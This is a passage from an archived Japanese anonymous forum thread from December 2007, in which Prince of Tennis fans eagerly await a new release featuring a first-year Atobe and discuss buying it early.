たしけのことだろうからすごいんだろうな…ウレシイケドチョットシンパイダ


133 :名無しかわいいよ名無し:2007/12/03(月) 13:42:45 ID:9v15BUSQ
抜け出せない
跡部道

134 :名無しかわいいよ名無し:2007/12/03(月) 14:15:31 ID:tzaJjHIr
40.5って早売りしてるとこある?

135 :名無しかわいいよ名無し:2007/12/03(月) 15:21:37 ID:DN9yJN0M
メイトは大抵1日前に入るよ
自分は明日まで待つよケゴタン早く見たいよケゴタン

136 :名無しかわいいよ名無し:2007/12/03(月) 15:58:54 ID:DeS6tC1E
1年の跡部、相当尖ってるなw
何かあったのか

地方者は公式発売日に手に入らないから悔しいなあ
ここで期待を膨らませとこう

137 :名無しかわいいよ名無し:2007/12/03(月) 22:05:24 ID:LA24+bGl
ジャンプ見た1年ケゴタン(;´Д`)ハァハァ
ついに明日か楽しみすぎる

138 :名無しかわいいよ名無し:2007/12/03(月) 22:24:00 ID:9v15BUSQ
死ぬまじで…

ケゴタンのせいで
今夜寝れない…

明日から期末テストなのに…

139 :名無しかわいいよ名無し:2007/12/03(月) 22:51:47 ID:8oVa6lmL
明日のために有給取ったよケゴタンw
楽しませてくれよケゴタンwww

140 :名無しかわいいよ名無し:2007/12/03(月) 23:10:59 ID:9p0L3djt
会社帰りにぜったい買うよ。
ケゴタン。

141 :名無しかわいいよ名無し:2007/12/04(火) 07:42:23 ID:0iX3Dm15
つづくのかwww
よーし読切りでもなんでもいい、続き描いてくれたしけ

31 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)